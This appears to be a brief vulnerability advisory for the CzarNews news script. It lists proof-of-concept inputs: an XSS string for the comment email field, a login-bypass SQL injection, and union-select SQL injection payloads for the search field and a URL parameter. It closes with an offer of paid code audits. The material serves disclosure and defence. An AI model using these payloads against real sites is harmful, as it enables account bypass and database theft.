PoC/Exploit for XSS and Multiple SQL Injection in CzarNews
Published Proof of Concept code - XSS and Multiple SQL Injection in CzarNews.
- Description
- Available
- Solution
- Not available - check vendor's website
1. Cross-Site Scripting Example:
URL: http://[host]/news.php?a=1
Post a Comment
Email: ">[XSS]<aaa aaa="
2. SQL Injection Examples:
URL: http://[host]/index.php
Username: ' or 1/*
Password: any
URL: http://[host]/news.php
News Search: zzzz%' union select 1,2,3,4,5,6,7,8,9,10/*
URL: http://[host]/news.php?a=999'%20union%20select%201,2,3,4,5,6,7,8,9,10/*
Order Source Code Testing
You may order source code audit of your site made by eVuln team.The order will be done by experts in web application security.